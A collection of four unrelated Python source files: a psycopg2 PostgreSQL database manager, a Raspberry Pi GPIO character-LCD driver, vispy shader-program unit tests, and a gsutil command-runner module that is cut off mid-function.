if value is None:
return None
from decimal import Decimal # re-import!
value = Decimal(value)
return value
def adapt_decimal(object):
"""Python Decimal -> SQL."""
return ppgext.AsIs(object)
NUMERIC = ppgext.new_type((1700,), 'NUMERIC', cast_decimal)
ppgext.register_type(NUMERIC)
ppgext.register_adapter(decimal.Decimal, adapt_decimal)
class Psycopg2DatabaseManager(DatabaseManager):
"""Psycopg2 database manager."""
name = 'psycopg2'
def __init__(self, dsn):
"""Constructor."""
super(Psycopg2DatabaseManager, self).__init__(dsn)
self.m_dialect = Psycopg2DatabaseDialect()
def _configure(self, config):
"""Configure using the Draco configuration file."""
super(Psycopg2DatabaseManager, self)._configure(config)
def dbapi(self):
"""Return the Python DB API."""
return psycopg2
def dialect(self):
"""Return a DatabaseDialect instance. """
return self.m_dialect
def dump_command(self, schema=None, output=None):
"""Return a command that will dump the contents of `schema'
to `output'.
If no schema is specified the entire database must be dumped. If
output is not specified, output should be written to standard
output.
"""
dsn = dict([i.split('=') for i in self.m_dsn.split()])
dbname = dsn.get('dbname')
if not dbname:
return
command = 'pg_dump --data-only'
if schema:
command += ' --schema=%s' % schema
if output:
command += ' --file=%s' % output
command += ' %s' % dbname
return command
def set_isolation_level(self, connection, level):
"""Set the isolation level of `connection' to `level'."""
dialect = self.dialect()
if not dialect.is_isolation_level(level):
m = 'Unknown transaction isolation level: %s'
raise ValueError, m % level
level = dialect.isolation_levels[level]
connection.set_isolation_level(level)
def set_client_encoding(self, connection, encoding):
"""Set the client encoding on the connection to `encoding'."""
dialect = self.dialect()
if not dialect.is_encoding(encoding):
m = 'Unknown client encoding: %s'
raise ValueError, m % encoding
connection.set_client_encoding(encoding)
def is_serialization_error(self, exception):
"""Return True if `exception' is a serialization error."""
# This is a HACK but there's no other way.
err = str(exception)
return err.startswith('could not serialize access') or \
err.startswith('deadlock detected')
def serialization_error(self):
"""Return an instance of a serialization error."""
err = DatabaseDBAPIError('could not serialize access')
return err
def is_primary_key_error(self, exception):
"""Return True if `exception' is a primary key error."""
err = str(exception)
return err.startswith('duplicate key violates')
def primary_key_error(self):
"""Return an instance of a primary key error."""
err = DatabaseDBAPIError('duplicate key violates')
return err
def _connect(self):
"""Create a new database connection."""
dbapi = self.dbapi()
try:
connection = dbapi.connect(dsn=self.m_dsn)
connection.set_client_encoding('UNICODE')
except dbapi.Error, err:
raise DatabaseInterfaceError, str(err)
return connection
class Psycopg2DatabaseDialect(DatabaseDialect):
"""A database dialect for Psycopg2/PostgreSQL."""
keywords = \
set((
'ALL', 'AND', 'ANY', 'AS', 'ASC', 'AUTHORIZATION',
'BETWEEN', 'BOTH', 'CASE', 'CAST', 'CHECK', 'COLLATE', 'COLUMN',
'CONSTRAINT', 'CREATE', 'CROSS', 'CURRENT_DATE', 'CURRENT_TIME',
'CURRENT_TIMESTAMP', 'CURRENT_USER', 'DEFAULT', 'DEFERRABLE',
'DESC', 'DISTINCT', 'ELSE', 'END', 'EXCEPT', 'FALSE', 'FOR',
'FOREIGN', 'FROM', 'FULL', 'GRANT', 'GROUP', 'HAVING', 'IN',
'INITIALLY', 'INNER', 'INTERSECT', 'INTO', 'IS', 'JOIN',
'LEADING', 'LEFT', 'LIKE', 'NATURAL', 'NOT', 'NULL', 'ON',
'ONLY', 'OR', 'ORDER', 'OUTER', 'OVERLAPS', 'PRIMARY',
'REFERENCES', 'RIGHT', 'SELECT', 'SESSION_USER', 'SOME',
'TABLE', 'THEN', 'TO', 'TRAILING', 'TRUE', 'UNION', 'UNIQUE',
'USER', 'USING', 'WHEN', 'WHERE'
))
isolation_levels = \
{
'READ UNCOMMITTED': ppgext.ISOLATION_LEVEL_READ_UNCOMMITTED,
'READ COMMITTED': ppgext.ISOLATION_LEVEL_READ_COMMITTED,
'REPEATABLE READ': ppgext.ISOLATION_LEVEL_REPEATABLE_READ,
'SERIALIZABLE': ppgext.ISOLATION_LEVEL_SERIALIZABLE
}
encodings = \
set((
'SQL_ASCII', 'EUC_JP', 'EUC_CN', 'EUC_KR', 'JOHAB', 'EUC_TW',
'UNICODE', 'MULE_INTERNAL', 'LATIN1', 'LATIN2', 'LATIN3', 'LATIN4',
'LATIN5', 'LATIN6', 'LATIN7', 'LATIN8', 'LATIN9', 'LATIN10',
'ISO_8859_5', 'ISO_8859_6', 'ISO_8859_7', 'ISO_8859_8', 'KOI8',
'WIN', 'ALT', 'WIN1256', 'TCVN', 'WIN874'
))
re_blob = re.compile('\s(BLOB|BINARY LARGE OBJECT)\s', re.I)
def translate(self, query):
head = query[:30].lstrip().upper()
if head.startswith('CREATE TABLE'):
query = self.re_blob.sub(' BYTEA ', query)
return query
|
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2013-2018 Danilo Bargen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import print_function, division, absolute_import, unicode_literals
from collections import namedtuple
import RPi.GPIO as GPIO
from . import common as c
from .lcd import BaseCharLCD
from .compat import range
PinConfig = namedtuple('PinConfig', 'rs rw e d0 d1 d2 d3 d4 d5 d6 d7 backlight mode')
class CharLCD(BaseCharLCD):
def __init__(self, numbering_mode=None, pin_rs=None, pin_rw=None, pin_e=None, pins_data=None,
pin_backlight=None, backlight_mode='active_low',
backlight_enabled=True,
cols=20, rows=4, dotsize=8,
charmap='A02',
auto_linebreaks=True):
"""
Character LCD controller.
The default pin numbers are based on the BOARD numbering scheme (1-26).
You can save 1 pin by not using RW. Set ``pin_rw`` to ``None`` if you
want this.
:param pin_rs: Pin for register select (RS). Default: ``15``.
:type pin_rs: int
:param pin_rw: Pin for selecting read or write mode (R/W). Set this to
``None`` for read only mode. Default: ``18``.
:type pin_rw: int
:param pin_e: Pin to start data read or write (E). Default: ``16``.
:type pin_e: int
:param pins_data: List of data bus pins in 8 bit mode (DB0-DB7) or in 4
bit mode (DB4-DB7) in ascending order. Default: ``[21, 22, 23, 24]``.
:type pins_data: list of int
:param pin_backlight: Pin for controlling backlight on/off. Set this to
``None`` for no backlight control. Default: ``None``.
:type pin_backlight: int
:param backlight_mode: Set this to either ``active_high`` or ``active_low``
to configure the operating control for the backlight. Has no effect if
pin_backlight is ``None``
:type backlight_mode: str
:param backlight_enabled: Whether the backlight is enabled initially.
Default: ``True``. Has no effect if pin_backlight is ``None``
:type backlight_enabled: bool
:param numbering_mode: Which scheme to use for numbering of the GPIO pins,
either ``GPIO.BOARD`` or ``GPIO.BCM``. Default: ``GPIO.BOARD`` (1-26).
:type numbering_mode: int
:param rows: Number of display rows (usually 1, 2 or 4). Default: ``4``.
:type rows: int
:param cols: Number of columns per row (usually 16 or 20). Default ``20``.
:type cols: int
:param dotsize: Some 1 line displays allow a font height of 10px.
Allowed: ``8`` or ``10``. Default: ``8``.
:type dotsize: int
:param charmap: The character map used. Depends on your LCD. This must
be either ``A00`` or ``A02``. Default: ``A02``.
:type charmap: str
:param auto_linebreaks: Whether or not to automatically insert line
breaks. Default: ``True``.
:type auto_linebreaks: bool
"""
# Set attributes
if numbering_mode == GPIO.BCM or numbering_mode == GPIO.BOARD:
self.numbering_mode = numbering_mode
else:
raise ValueError('Invalid GPIO numbering mode: numbering_mode=%s, '
'must be either GPIO.BOARD or GPIO.BCM.\n'
'See https://gist.github.com/dbrgn/77d984a822bfc9fddc844f67016d0f7e '
'for more details.' % numbering_mode)
if pin_rs is None:
raise ValueError('pin_rs is not defined.')
if pin_e is None:
raise ValueError('pin_e is not defined.')
if len(pins_data) == 4: # 4 bit mode
self.data_bus_mode = c.LCD_4BITMODE
block1 = [None] * 4
elif len(pins_data) == 8: # 8 bit mode
self.data_bus_mode = c.LCD_8BITMODE
block1 = pins_data[:4]
else:
raise ValueError('There should be exactly 4 or 8 data pins.')
block2 = pins_data[-4:]
self.pins = PinConfig(rs=pin_rs, rw=pin_rw, e=pin_e,
d0=block1[0], d1=block1[1], d2=block1[2], d3=block1[3],
d4=block2[0], d5=block2[1], d6=block2[2], d7=block2[3],
backlight=pin_backlight,
mode=numbering_mode)
self.backlight_mode = backlight_mode
# Call superclass
super(CharLCD, self).__init__(cols, rows, dotsize,
charmap=charmap,
auto_linebreaks=auto_linebreaks)
# Set backlight status
if pin_backlight is not None:
self.backlight_enabled = backlight_enabled
def _init_connection(self):
# Setup GPIO
GPIO.setmode(self.numbering_mode)
for pin in list(filter(None, self.pins))[:-1]:
GPIO.setup(pin, GPIO.OUT)
if self.pins.backlight is not None:
GPIO.setup(self.pins.backlight, GPIO.OUT)
# Initialization
c.msleep(50)
GPIO.output(self.pins.rs, 0)
GPIO.output(self.pins.e, 0)
if self.pins.rw is not None:
GPIO.output(self.pins.rw, 0)
def _close_connection(self):
pins = (self.pins.rs, self.pins.rw, self.pins.e, self.pins.d0, self.pins.d1,
self.pins.d2, self.pins.d3, self.pins.d4, self.pins.d5, self.pins.d6,
self.pins.d7)
active_pins = [pin for pin in pins if pin is not None]
GPIO.cleanup(active_pins)
# Properties
def _get_backlight_enabled(self):
# We could probably read the current GPIO output state via sysfs, but
# for now let's just store the state in the class
if self.pins.backlight is None:
raise ValueError('You did not configure a GPIO pin for backlight control!')
return bool(self._backlight_enabled)
def _set_backlight_enabled(self, value):
if self.pins.backlight is None:
raise ValueError('You did not configure a GPIO pin for backlight control!')
if not isinstance(value, bool):
raise ValueError('backlight_enabled must be set to ``True`` or ``False``.')
self._backlight_enabled = value
GPIO.output(self.pins.backlight,
value ^ (self.backlight_mode == 'active_low'))
backlight_enabled = property(_get_backlight_enabled, _set_backlight_enabled,
doc='Whether or not to turn on the backlight.')
# Low level commands
def _send(self, value, mode):
"""Send the specified value to the display with automatic 4bit / 8bit
selection. The rs_mode is either ``RS_DATA`` or ``RS_INSTRUCTION``."""
# Choose instruction or data mode
GPIO.output(self.pins.rs, mode)
# If the RW pin is used, set it to low in order to write.
if self.pins.rw is not None:
GPIO.output(self.pins.rw, 0)
# Write data out in chunks of 4 or 8 bit
if self.data_bus_mode == c.LCD_8BITMODE:
self._write8bits(value)
else:
self._write4bits(value >> 4)
self._write4bits(value)
def _send_data(self, value):
"""Send data to the display. """
self._send(value, c.RS_DATA)
def _send_instruction(self, value):
"""Send instruction to the display. """
self._send(value, c.RS_INSTRUCTION)
def _write4bits(self, value):
"""Write 4 bits of data into the data bus."""
for i in range(4):
bit = (value >> i) & 0x01
GPIO.output(self.pins[i + 7], bit)
self._pulse_enable()
def _write8bits(self, value):
"""Write 8 bits of data into the data bus."""
for i in range(8):
bit = (value >> i) & 0x01
GPIO.output(self.pins[i + 3], bit)
self._pulse_enable()
def _pulse_enable(self):
"""Pulse the `enable` flag to process data."""
GPIO.output(self.pins.e, 0)
c.usleep(1)
GPIO.output(self.pins.e, 1)
c.usleep(1)
GPIO.output(self.pins.e, 0)
c.usleep(100) # commands need > 37us to settle
|
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2014, Nicolas P. Rougier. All rights reserved.
# Distributed under the terms of the new BSD License.
# -----------------------------------------------------------------------------
import unittest
import numpy as np
from vispy import gloo, app
from vispy.gloo.program import Program
from vispy.testing import run_tests_if_main, assert_in, requires_application
from vispy.gloo.context import set_current_canvas, forget_canvas
class DummyParser(gloo.glir.BaseGlirParser):
def convert_shaders(self):
return 'desktop'
def parse(self, commands):
pass
class DummyCanvas:
def __init__(self):
self.context = gloo.context.GLContext()
self.context.shared.parser = DummyParser()
self.context.glir.flush = lambda *args: None # No flush
class ProgramTest(unittest.TestCase):
def test_init(self):
# Test ok init, no shaders
program = Program()
assert program._user_variables == {}
assert program._code_variables == {}
assert program._pending_variables == {}
assert program.shaders == ('', '')
# Test ok init, with shader
program = Program('A', 'B')
assert program.shaders == ('A', 'B')
# False inits
self.assertRaises(ValueError, Program, 'A', None)
self.assertRaises(ValueError, Program, None, 'B')
self.assertRaises(ValueError, Program, 3, 'B')
self.assertRaises(ValueError, Program, 3, None)
self.assertRaises(ValueError, Program, 'A', 3)
self.assertRaises(ValueError, Program, None, 3)
self.assertRaises(ValueError, Program, "", "")
self.assertRaises(ValueError, Program, "foo", "")
self.assertRaises(ValueError, Program, "", "foo")
def test_setting_shaders(self):
program = Program("A", "B")
assert program.shaders[0] == "A"
assert program.shaders[1] == "B"
program.set_shaders('C', 'D')
assert program.shaders[0] == "C"
assert program.shaders[1] == "D"
@requires_application()
def test_error(self):
vert = '''
void main() {
vec2 xy;
error on this line
vec2 ab;
}
'''
frag = 'void main() { glFragColor = vec4(1, 1, 1, 1); }'
with app.Canvas() as c:
program = Program(vert, frag)
try:
program._glir.flush(c.context.shared.parser)
except Exception as err:
assert_in('error on this line', str(err))
else:
raise Exception("Compile program should have failed.")
def test_uniform(self):
# Text array unoforms
program = Program("uniform float A[10];", "foo")
assert ('uniform_array', 'float', 'A') in program.variables
assert len(program.variables) == 11 # array plus elements
self.assertRaises(ValueError, program.__setitem__, 'A',
np.ones((9, 1)))
program['A'] = np.ones((10, 1))
program['A[0]'] = 0
assert 'A[0]' in program._user_variables
assert 'A[0]' not in program._pending_variables
# Init program
program = Program("uniform float A;",
"uniform float A; uniform vec4 B;")
assert ('uniform', 'float', 'A') in program.variables
assert ('uniform', 'vec4', 'B') in program.variables
assert len(program.variables) == 2
# Set existing uniforms
program['A'] = 3.0
assert isinstance(program['A'], np.ndarray)
assert program['A'] == 3.0
assert 'A' in program._user_variables
#
program['B'] = 1.0, 2.0, 3.0, 4.0
assert isinstance(program['B'], np.ndarray)
assert all(program['B'] == np.array((1.0, 2.0, 3.0, 4.0), np.float32))
assert 'B' in program._user_variables
# Set non-existent uniforms
program['C'] = 1.0, 2.0
assert program['C'] == (1.0, 2.0)
assert 'C' not in program._user_variables
assert 'C' in program._pending_variables
# Set samplers
program.set_shaders("""uniform sampler1D T1;
uniform sampler2D T2;
uniform sampler3D T3;""", "f")
program['T1'] = np.zeros((10, ), np.float32)
program['T2'] = np.zeros((10, 10), np.float32)
program['T3'] = np.zeros((10, 10, 10), np.float32)
assert isinstance(program['T1'], gloo.Texture1D)
assert isinstance(program['T2'], gloo.Texture2D)
assert isinstance(program['T3'], gloo.Texture3D)
# Set samplers with textures
tex = gloo.Texture2D((10, 10))
program['T2'] = tex
assert program['T2'] is tex
program['T2'] = np.zeros((10, 10), np.float32) # Update texture
assert program['T2'] is tex
# C should be taken up when code comes along that mentions it
program.set_shaders("uniform float A; uniform vec2 C;",
"uniform float A; uniform vec4 B;")
assert isinstance(program['C'], np.ndarray)
assert all(program['C'] == np.array((1.0, 2.0), np.float32))
assert 'C' in program._user_variables
assert 'C' not in program._pending_variables
# Set wrong values
self.assertRaises(ValueError, program.__setitem__, 'A', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'B', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'C', 1.0)
# Set wrong values beforehand
program['D'] = 1.0, 2.0
self.assertRaises(ValueError, program.set_shaders,
'', 'uniform vec3 D;')
def test_attributes(self):
program = Program("attribute float A; attribute vec4 B;", "foo")
assert ('attribute', 'float', 'A') in program.variables
assert ('attribute', 'vec4', 'B') in program.variables
assert len(program.variables) == 2
from vispy.gloo import VertexBuffer
vbo = VertexBuffer()
# Set existing uniforms
program['A'] = vbo
assert program['A'] == vbo
assert 'A' in program._user_variables
assert program._user_variables['A'] is vbo
# Set data - update existing vbp
program['A'] = np.zeros((10,), np.float32)
assert program._user_variables['A'] is vbo
# Set data - create new vbo
program['B'] = np.zeros((10, 4), np.float32)
assert isinstance(program._user_variables['B'], VertexBuffer)
# Set non-existent uniforms
vbo = VertexBuffer() # new one since old one is now wrong size
program['C'] = vbo
assert program['C'] == vbo
assert 'C' not in program._user_variables
assert 'C' in program._pending_variables
# C should be taken up when code comes along that mentions it
program.set_shaders("attribute float A; attribute vec2 C;", "foo")
assert program['C'] == vbo
assert 'C' in program._user_variables
assert 'C' not in program._pending_variables
# Set wrong values
self.assertRaises(ValueError, program.__setitem__, 'A', 'asddas')
# Set wrong values beforehand
program['D'] = ""
self.assertRaises(ValueError, program.set_shaders,
'attribute vec3 D;', '')
# Set to one value per vertex
program.set_shaders("attribute float A; attribute vec2 C;", "foo")
program['A'] = 1.0
assert program['A'] == 1.0
program['C'] = 1.0, 2.0
assert all(program['C'] == np.array((1.0, 2.0), np.float32))
#
self.assertRaises(ValueError, program.__setitem__, 'A', (1.0, 2.0))
self.assertRaises(ValueError, program.__setitem__, 'C', 1.0)
self.assertRaises(ValueError, program.bind, 'notavertexbuffer')
program = Program("attribute vec2 C;", "foo")
# first code path: no exsting variable
self.assertRaises(ValueError, program.__setitem__, 'C',
np.ones((2, 10), np.float32))
# second code path: variable exists (VertexBuffer.set_data)
program['C'] = np.ones((10, 2), np.float32)
self.assertRaises(ValueError, program.__setitem__, 'C',
np.ones((2, 10), np.float32))
def test_vbo(self):
# Test with count
program = Program('attribute float a; attribute vec2 b;', 'foo', 10)
assert program._count == 10
assert ('attribute', 'float', 'a') in program.variables
assert ('attribute', 'vec2', 'b') in program.variables
# Set
program['a'] = np.ones((10,), np.float32)
assert np.all(program._buffer['a'] == 1)
def test_varyings(self):
# Varyings and constants are detected
program = Program("varying float A; const vec4 B;", "foo")
assert ('varying', 'float', 'A') in program.variables
assert ('const', 'vec4', 'B') in program.variables
# But cannot be set
self.assertRaises(KeyError, program.__setitem__, 'A', 3.0)
self.assertRaises(KeyError, program.__setitem__, 'B', (1.0, 2.0, 3.0))
# And anything else also fails
self.assertRaises(KeyError, program.__getitem__, 'fooo')
def test_draw(self):
# Init
program = Program("attribute float A;", "uniform float foo")
program['A'] = np.zeros((10,), np.float32)
dummy_canvas = DummyCanvas()
glir = dummy_canvas.context.glir
set_current_canvas(dummy_canvas)
try:
# Draw arrays
program.draw('triangles')
glir_cmd = glir.clear()[-1]
assert glir_cmd[0] == 'DRAW'
assert len(glir_cmd[-1]) == 2
# Draw elements
indices = gloo.IndexBuffer(np.zeros(10, dtype=np.uint8))
program.draw('triangles', indices)
glir_cmd = glir.clear()[-1]
assert glir_cmd[0] == 'DRAW'
assert len(glir_cmd[-1]) == 3
# Invalid mode
self.assertRaises(ValueError, program.draw, 'nogeometricshape')
# Invalid index
self.assertRaises(TypeError, program.draw, 'triangles', 'notindex')
# No atributes
program = Program("attribute float A;", "uniform float foo")
self.assertRaises(RuntimeError, program.draw, 'triangles')
# Atributes with different sizes
program = Program("attribute float A; attribute float B;", "foo")
program['A'] = np.zeros((10,), np.float32)
program['B'] = np.zeros((11,), np.float32)
self.assertRaises(RuntimeError, program.draw, 'triangles')
finally:
forget_canvas(dummy_canvas)
run_tests_if_main()
|
|
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class that runs a named gsutil command."""
from __future__ import absolute_import
import difflib
import logging
import os
import pkgutil
import sys
import textwrap
import time
import boto
from boto.storage_uri import BucketStorageUri
import gslib
from gslib.cloud_api_delegator import CloudApiDelegator
from gslib.command import Command
from gslib.command import CreateGsutilLogger
from gslib.command import GetFailureCount
from gslib.command import OLD_ALIAS_MAP
from gslib.command import ShutDownGsutil
import gslib.commands
from gslib.cs_api_map import ApiSelector
from gslib.cs_api_map import GsutilApiClassMapFactory
from gslib.cs_api_map import GsutilApiMapFactory
from gslib.exception import CommandException
from gslib.gcs_json_api import GcsJsonApi
from gslib.no_op_credentials import NoOpCredentials
from gslib.tab_complete import MakeCompleter
from gslib.util import CompareVersions
from gslib.util import GetGsutilVersionModifiedTime
from gslib.util import GSUTIL_PUB_TARBALL
from gslib.util import IsRunningInteractively
from gslib.util import LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE
from gslib.util import LookUpGsutilVersion
from gslib.util import MultiprocessingIsAvailable
from gslib.util import RELEASE_NOTES_URL
from gslib.util import SECONDS_PER_DAY
from gslib.util import UTF8
def HandleArgCoding(args):
"""Handles coding of command-line args.
Args:
args: array of command-line args.
Returns:
array of command-line args.
Raises:
CommandException: if errors encountered.
"""
# Python passes arguments from the command line as byte strings. To
# correctly interpret them, we decode ones other than -h and -p args (which
# will be passed as headers, and thus per HTTP spec should not be encoded) as
# utf-8. The exception is x-goog-meta-* headers, which are allowed to contain
# non-ASCII content (and hence, should be decoded), per
# https://developers.google.com/storage/docs/gsutil/addlhelp/WorkingWithObjectMetadata
processing_header = False
for i in range(len(args)):
arg = args[i]
# Commands like mv can run this function twice; don't decode twice.
try:
decoded = arg if isinstance(arg, unicode) else arg.decode(UTF8)
except UnicodeDecodeError:
raise CommandException('\n'.join(textwrap.wrap(
'Invalid encoding for argument (%s). Arguments must be decodable as '
'Unicode. NOTE: the argument printed above replaces the problematic '
'characters with a hex-encoded printable representation. For more '
'details (including how to convert to a gsutil-compatible encoding) '
'see `gsutil help encoding`.' % repr(arg))))
if processing_header:
if arg.lower().startswith('x-goog-meta'):
args[i] = decoded
else:
try:
# Try to encode as ASCII to check for invalid header values (which
# can't be sent over HTTP).
decoded.encode('ascii')
except UnicodeEncodeError:
# Raise the CommandException using the decoded value because
# _OutputAndExit function re-encodes at the end.
raise CommandException(
'Invalid non-ASCII header value (%s).\nOnly ASCII characters are '
'allowed in headers other than x-goog-meta- headers' % decoded)
else:
args[i] = decoded
processing_header = (arg in ('-h', '-p'))
return args
class CommandRunner(object):
"""Runs gsutil commands and does some top-level argument handling."""
def __init__(self, bucket_storage_uri_class=BucketStorageUri,
gsutil_api_class_map_factory=GsutilApiClassMapFactory,
command_map=None):
"""Instantiates a CommandRunner.
Args:
bucket_storage_uri_class: Class to instantiate for cloud StorageUris.
Settable for testing/mocking.
gsutil_api_class_map_factory: Creates map of cloud storage interfaces.
Settable for testing/mocking.
command_map: Map of command names to their implementations for
testing/mocking. If not set, the map is built dynamically.
"""
self.bucket_storage_uri_class = bucket_storage_uri_class
self.gsutil_api_class_map_factory = gsutil_api_class_map_factory
if command_map:
self.command_map = command_map
else:
self.command_map = self._LoadCommandMap()
def _LoadCommandMap(self):
"""Returns dict mapping each command_name to implementing class."""
# Import all gslib.commands submodules.
for _, module_name, _ in pkgutil.iter_modules(gslib.commands.__path__):
__import__('gslib.commands.%s' % module_name)
command_map = {}
# Only include Command subclasses in the dict.
for command in Command.__subclasses__():
command_map[command.command_spec.command_name] = command
for command_name_aliases in command.command_spec.command_name_aliases:
command_map[command_name_aliases] = command
return command_map
def _ConfigureCommandArgumentParserArguments(
self, parser, arguments, gsutil_api):
"""Configures an argument parser with the given arguments.
Args:
parser: argparse parser object.
arguments: array of CommandArgument objects.
gsutil_api: gsutil Cloud API instance to use.
Raises:
RuntimeError: if argument is configured with unsupported completer
"""
for command_argument in arguments:
action = parser.add_argument(
*command_argument.args, **command_argument.kwargs)
if command_argument.completer:
action.completer = MakeCompleter(command_argument.completer, gsutil_api)
def ConfigureCommandArgumentParsers(self, subparsers):
"""Configures argparse arguments and argcomplete completers for commands.
Args:
subparsers: argparse object that can be used to add parsers for
subcommands (called just 'commands' in gsutil)
"""
# This should match the support map for the "ls" command.
support_map = {
'gs': [ApiSelector.XML, ApiSelector.JSON],
's3': [ApiSelector.XML]
}
default_map = {
'gs': ApiSelector.JSON,
's3': ApiSelector.XML
}
gsutil_api_map = GsutilApiMapFactory.GetApiMap(
self.gsutil_api_class_map_factory, support_map, default_map)
logger = CreateGsutilLogger('tab_complete')
gsutil_api = CloudApiDelegator(
self.bucket_storage_uri_class, gsutil_api_map,
logger, debug=0)
for command in set(self.command_map.values()):
command_parser = subparsers.add_parser(
command.command_spec.command_name, add_help=False)
if isinstance(command.command_spec.argparse_arguments, dict):
subcommand_parsers = command_parser.add_subparsers()
subcommand_argument_dict = command.command_spec.argparse_arguments
for subcommand, arguments in subcommand_argument_dict.iteritems():
subcommand_parser = subcommand_parsers.add_parser(
subcommand, add_help=False)
self._ConfigureCommandArgumentParserArguments(
subcommand_parser, arguments, gsutil_api)
else:
self._ConfigureCommandArgumentParserArguments(
command_parser, command.command_spec.argparse_arguments, gsutil_api)
def RunNamedCommand(self, command_name, args=None, headers=None, debug=0,
parallel_operations=False, test_method=None,
skip_update_check=False, logging_filters=None,
do_shutdown=True):
"""Runs the named command.
Used by gsutil main, commands built atop other commands, and tests.
Args:
command_name: The name of the command being run.
args: Command-line args (arg0 = actual arg, not command name ala bash).
headers: Dictionary containing optional HTTP headers to pass to boto.
debug: Debug level to pass in to boto connection (range 0..3).
parallel_operations: Should command operations be executed in parallel?
test_method: Optional general purpose method for testing purposes.
Application and semantics of this method will vary by
command and test type.
skip_update_check: Set to True to disable checking for gsutil updates.
logging_filters: Optional list of logging.Filters to apply to this
command's logger.
do_shutdown: Stop all parallelism framework workers iff this is True.
Raises:
CommandException: if errors encountered.
Returns:
Return value(s) from Command that was run.
"""
if (not skip_update_check and
self.MaybeCheckForAndOfferSoftwareUpdate(command_name, debug)):
command_name = 'update'
args = ['-n']
if not args:
args = []
# Include api_version header in all commands.
api_version = boto.config.get_value('GSUtil', 'default_api_version', '1')
if not headers:
headers = {}
headers['x-goog-api-version'] = api_version
if command_name not in self.command_map:
close_matches = difflib.get_close_matches(
command_name, self.command_map.keys(), n=1)
if close_matches:
# Instead of suggesting a deprecated command alias, suggest the new
# name for that command.
translated_command_name = (
OLD_ALIAS_MAP.get(close_matches[0], close_matches)[0])
print >> sys.stderr, 'Did you mean this?'
print >> sys.stderr, '\t%s' % translated_command_name
elif command_name == 'update' and gslib.IS_PACKAGE_INSTALL:
sys.stderr.write(
'Update command is not supported for package installs; '
'please instead update using your package manager.')
raise CommandException('Invalid command "%s".' % command_name)
if '--help' in args:
new_args = [command_name]
original_command_class = self.command_map[command_name]
subcommands = original_command_class.help_spec.subcommand_help_text.keys()
for arg in args:
if arg in subcommands:
new_args.append(arg)
break # Take the first match and throw away the rest.
args = new_args
command_name = 'help'
args = HandleArgCoding(args)
command_class = self.command_map[command_name]
command_inst = command_class(
self, args, headers, debug, parallel_operations,
self.bucket_storage_uri_class, self.gsutil_api_class_map_factory,
test_method, logging_filters, command_alias_used=command_name)
return_code = command_inst.RunCommand()
if MultiprocessingIsAvailable()[0] and do_shutdown:
ShutDownGsutil()
if GetFailureCount() > 0:
return_code = 1
return return_code
def MaybeCheckForAndOfferSoftwareUpdate(self, command_name, debug):
"""Checks the last time we checked for an update and offers one if needed.
Offer is made if the time since the last update check is longer
than the configured threshold offers the user to update gsutil.
Args:
command_name: The name of the command being run.
debug: Debug level to pass in to boto connection (range 0..3).
Returns:
True if the user decides to update.
"""
# Don't try to interact with user if:
# - gsutil is not connected to a tty (e.g., if being run from cron);
# - user is running gsutil -q
# - user is running the config command (which could otherwise attempt to
# check for an update for a user running behind a proxy, who has not yet
# configured gsutil to go through the proxy; for such users we need the
# first connection attempt to be made by the gsutil config command).
# - user is running the version command (which gets run when using
# gsutil -D, which would prevent users with proxy config problems from
# sending us gsutil -D output).
# - user is running the update command (which could otherwise cause an
# additional note that an update is available when user is already trying
# to perform an update);
# - user specified gs_host (which could be a non-production different
# service instance, in which case credentials won't work for checking
# gsutil tarball).
# - user is using a Cloud SDK install (which should only be updated via
# gcloud components update)
logger = logging.getLogger()
gs_host = boto.config.get('Credentials', 'gs_host', None)
if (not IsRunningInteractively()
or command_name in ('config', 'update', 'ver', 'version')
or not logger.isEnabledFor(logging.INFO)
or gs_host
or os.environ.get('CLOUDSDK_WRAPPER') == '1'):
return False
software_update_check_period = boto.config.getint(
'GSUtil', 'software_update_check_period', 30)
# Setting software_update_check_period to 0 means periodic software
# update checking is disabled.
if software_update_check_period == 0:
return False
cur_ts = int(time.time())
if not os.path.isfile(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE):
# Set last_checked_ts from date of VERSION file, so if the user installed
# an old copy of gsutil it will get noticed (and an update offered) the
# first time they try to run it.
last_checked_ts = GetGsutilVersionModifiedTime()
with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'w') as f:
f.write(str(last_checked_ts))
else:
try:
with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'r') as f:
last_checked_ts = int(f.readline())
except (TypeError, ValueError):
return False
if (cur_ts - last_checked_ts
> software_update_check_period * SECONDS_PER_DAY):
# Create a credential-less gsutil API to check for the public
# update tarball.
gsutil_api = GcsJsonApi(self.bucket_storage_uri_class, logger,
credentials=NoOpCredentials(), debug=debug)
cur_ver = LookUpGsutilVersion(gsutil_api, GSUTIL_PUB_TARBALL)
